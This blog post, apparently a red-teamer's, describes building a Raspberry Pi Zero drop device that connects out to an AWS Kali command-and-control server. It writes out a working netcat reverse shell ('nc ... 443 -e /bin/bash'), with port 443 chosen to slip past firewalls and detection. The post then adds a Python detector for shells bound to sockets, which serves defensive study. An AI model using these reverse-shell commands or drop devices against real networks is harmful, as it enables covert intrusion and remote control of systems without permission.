You might be wondering why it took me so long. Better late than never, but hey! I’m now a bit obsessed with these little boards and have become a problem-solver, always looking for the next cool project. That was the inspiration for my latest one. Let me tell you about it.
The big idea
I wanted to do something with a Raspberry Pi Zero that would incorporate my love for red-teaming/offensive security, I wanted it to take as many paths of least resistance as possible, and it couldn’t be super expensive ($50-ish USD). Once I had the basic parameters set, I was able to come up with the problem to solve. Think, think, think…
It’s mine! The Pi Zero is small and easy to conceal. You could even use it as an “insider threat device” that can…
Be dropped off at the target site
Connect via an Ethernet cable or Wi-Fi
Be powered by USB or a power pack
Auto-connect to a Command-and-Control (C2) server
Be accessed from mobile devices like smartphones
Run full Linux with pentesting tools
Now, I can already hear some people saying it.
“Doesn’t Hak5 make that?”
They do! It’s called a LAN Turtle, and it’s an amazing product (I own two). As I mentioned, I am a solution-seeker. Even though there are already solutions, it doesn’t mean that I can’t create my own. The fun part of it all for me is the building, the striving, the learning and the creation of something unique to my way of doing business. This project was all of those things, I can assure you.
Before I bought gear, I had to make sure I could get the idea to work. So I looked at what I already had (remember, we’re hitting the ‘easy button’ as often as possible). That was my laptop.
I need to obtain a shell from a device sitting inside a NATed/firewalled network, and I want to reach that shell from my mobile device from anywhere in the world. It made sense to encrypt the communication to keep it secure from prying eyes, and possibly even to avoid IDS/IPS detection.
I initially thought about using SSH but wasn’t sure how I would learn the device’s internal IP address. What if I had NAT to deal with? Connecting from the outside in would be too difficult. That means the device must connect from the inside out, to my mobile. That shouldn’t be too hard: I could use netcat to push a shell to my mobile. But then I need a way for the Pi to find my mobile’s IP, which is the exact same problem in reverse. At this point I realized that I needed an Internet-facing device with a static IP. This would be the “bridge” between the Pi and my phone, allowing them to communicate with each other. Here’s an illustration of the topology.
Demonstration of concept
The idea is to create an EC2 instance in AWS that acts as my ‘bridge’, or perhaps as a C2 server. In fact it will do both jobs. I already had an Amazon account, so this was the easiest way to get an Internet-facing device up and running in a short time and at a very affordable price.
I chose the Kali AMI from the Amazon Marketplace. I configured it as a t2.micro, which currently runs at $0.012/hr. I also needed to provision it with an ‘Elastic IP’. AWS provides this static IP for free as long as it is associated with a running instance; it costs $0.006/hr if the instance isn’t running (or the interface isn’t associated with the IP).
After the instance launched, I connected via SSH and ran updates. I also changed the default root/user passwords. To allow incoming shell connections, I needed to open a port in the instance’s AWS security group (its firewall). I chose port 443 because it looks like standard web (HTTPS) traffic that outbound firewalls rarely block. All of this took approximately 20-30 minutes.
Next, I wanted to test whether I could make a netcat reverse shell connection between my laptop and the C2 server. I will be using ‘ncat’ for this, not the more traditional ‘netcat/nc’. I had to install it on both my C2 Kali instance and my laptop’s WSL Kali instance.
Once that was done in AWS, I ran…
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Then, I ran from my laptop WSL Kali…
$ nc -nv [C2-Elastic-IP] 443 -e /bin/bash
I look back at my C2 SSH terminal and find…
Ncat: Connection to [Laptop IP]
Ncat: Connection to [Laptop IP]:1917
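From the defender’s side, the `-e /bin/bash` connection above leaves a very recognisable footprint on the host that made it: a shell process whose standard input, output and error are a network socket rather than a terminal. On Linux, `/proc/<pid>/fd/0`, `/fd/1` and `/fd/2` are symlinks whose target reads `socket:[<inode>]` in that case. The following is an added example (not code from this post or from Kali/ncat) that implements that check. It runs over a constructed process snapshot so it works offline, and it also includes a best-effort live collector for `/proc` that assumes a Linux host and permission to read other users’ fd links.

```python
"""Flag shell processes whose stdin/stdout/stderr are network sockets.

A reverse shell started as `nc -e /bin/bash` (or similar) leaves the
spawned shell with its standard streams dup'ed onto the socket. On Linux
the symlink /proc/<pid>/fd/<n> then reads `socket:[<inode>]`, so a quick
host check is: for every process whose command name is a shell, read the
targets of fds 0, 1 and 2 and alert if any of them is a socket.
"""
import os
import re
from dataclasses import dataclass, field

# Command names (as shown in /proc/<pid>/comm) treated as shells.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


@dataclass
class Proc:
    pid: int
    comm: str                 # executable name, e.g. "bash"
    parent_comm: str          # parent's comm, kept for alert context
    fds: dict = field(default_factory=dict)  # fd number -> readlink target


def is_socket(target: str) -> bool:
    """True if an fd symlink target denotes a socket, e.g. 'socket:[48213]'."""
    return SOCKET_RE.match(target) is not None


def find_shells_on_sockets(procs):
    """Return one alert dict per shell process with a socket on fd 0, 1 or 2."""
    alerts = []
    for p in procs:
        if p.comm not in SHELLS:
            continue
        bound = [fd for fd in (0, 1, 2) if is_socket(p.fds.get(fd, ""))]
        if bound:
            alerts.append({"pid": p.pid, "comm": p.comm,
                           "parent": p.parent_comm, "socket_fds": bound})
    return alerts


def _read_comm(pid: int) -> str:
    with open(f"/proc/{pid}/comm") as f:
        return f.read().strip()


def snapshot_live_procs():
    """Best-effort collection from /proc (Linux only; unreadable processes are skipped)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            comm = _read_comm(pid)
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            # Fields after the last ')' avoid confusion from spaces in comm;
            # the ppid is the second of those fields.
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
            parent_comm = _read_comm(ppid) if ppid > 0 else ""
            fds = {}
            for n in (0, 1, 2):
                try:
                    fds[n] = os.readlink(f"/proc/{pid}/fd/{n}")
                except OSError:
                    pass  # no permission or fd closed; leave it out
            procs.append(Proc(pid, comm, parent_comm, fds))
        except (OSError, ValueError, IndexError):
            continue  # process exited or is not readable by us
    return procs


# Constructed sample snapshot (not captured from a real host).
SAMPLE_PROCS = [
    # Normal interactive login shell: streams are a pseudo-terminal.
    Proc(1234, "bash", "sshd", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    # The `nc -e /bin/bash` pattern: every standard stream is the socket.
    Proc(2345, "bash", "nc", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    # A network daemon with a socket on stdin is not a shell, so it is ignored.
    Proc(2346, "python3", "systemd", {0: "socket:[48300]", 1: "/dev/null", 2: "/dev/null"}),
    # A cron job shell writing to a pipe: pipes are not sockets, no alert.
    Proc(2347, "sh", "cron", {0: "/dev/null", 1: "pipe:[500]", 2: "pipe:[500]"}),
]

if __name__ == "__main__":
    for a in find_shells_on_sockets(SAMPLE_PROCS):
        print(f"ALERT pid={a['pid']} {a['comm']} (parent {a['parent']}) "
              f"has socket on fds {a['socket_fds']}")
```

Running the sample flags only pid 2345, the bash launched by `nc`. On a live host, `find_shells_on_sockets(snapshot_live_procs())` does the same scan over real processes. Two caveats worth knowing: some wrappers connect the shell through pipes instead of the raw socket (ncat does this when TLS is in play), which this check will not see, and a legitimately socket-activated service could match, so the parent name in the alert is there to help triage rather than to auto-block.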